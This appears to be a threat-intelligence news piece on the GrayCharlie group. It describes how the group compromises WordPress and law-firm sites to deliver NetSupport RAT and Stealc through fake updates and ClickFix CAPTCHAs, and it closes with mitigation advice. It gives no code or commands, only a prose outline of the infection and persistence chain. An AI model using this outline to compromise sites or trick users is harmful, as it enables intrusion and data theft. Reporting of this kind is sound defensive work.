GrayCharlie Exploits WordPress Sites to Deploy NetSupport RAT and Stealc Malware
Since mid-2023, a cybercriminal group identified as GrayCharlie has been infiltrating WordPress websites, embedding malicious JavaScript to distribute malware to unsuspecting visitors. This group shares characteristics with the previously tracked SmartApeSG cluster, also known as ZPHP or HANEMONEY. Their primary tool is NetSupport RAT, a remote access trojan that grants attackers full control over infected systems. Additionally, GrayCharlie has deployed Stealc, an information-stealing malware, and more recently, SectopRAT, expanding their capabilities to exfiltrate sensitive data from compromised machines.
Infection Mechanism
GrayCharlie’s method involves inserting a script tag into the Document Object Model (DOM) of legitimate but compromised WordPress sites. This tag references an external JavaScript file hosted on attacker-controlled servers. When a user visits the infected page, the script profiles their browser and operating system to determine the next course of action. Victims are then presented with either a convincing fake browser update or a ClickFix-style fake CAPTCHA, both designed to trick users into executing the malware themselves.
Infrastructure and Operations
Analysts from Recorded Future have linked GrayCharlie’s backend infrastructure primarily to MivoCloud and HZ Hosting Ltd. They identified two main clusters of NetSupport RAT command-and-control (C2) servers, each characterized by distinct TLS certificate naming patterns, license keys, and serial numbers, deployed consistently throughout 2025. The group manages C2 servers over TCP port 443 and uses SSH for staging servers, making their traffic appear legitimate. Browsing patterns from higher-tier infrastructure suggest that at least some members of GrayCharlie are Russian-speaking.
Targeted Industries and Geographies
GrayCharlie’s attacks span various industries worldwide, with the United States being the most frequently targeted. At least fifteen U.S. law firm websites were found to have identical malicious JavaScript injections pointing to the same attacker domain. Researchers believe these law firms were compromised through a supply-chain attack involving SMB Team, an IT services company serving numerous law firms across North America. Stolen credentials associated with an SMB Team email address surfaced around the time the malicious domain first became active.
Attack Chains
Once a victim executes the fake update JavaScript, WScript spawns PowerShell, which downloads and extracts a full NetSupport RAT client into the user’s AppData folder. The ClickFix chain operates similarly—the user pastes an attacker-planted command that retrieves a batch file, installs the RAT, and writes a Registry Run key for persistence on every reboot. Operators connect via C2, perform system reconnaissance, and can deploy SectopRAT as a secondary payload.
Mitigation Strategies
To reduce exposure to such attacks, security teams should:
– Block Known Malicious IPs and Domains: Implement network-level blocks for IP addresses and domains associated with GrayCharlie.
– Deploy Detection Rules: Utilize YARA, Snort, and Sigma rules to detect and prevent malicious activities.
– Regularly Update and Patch Systems: Ensure all software, especially WordPress installations and plugins, are up-to-date to mitigate vulnerabilities.
– Educate Users: Train staff to recognize phishing attempts and avoid executing unsolicited scripts or software updates.
By implementing these measures, organizations can enhance their defenses against sophisticated threats like those posed by GrayCharlie.
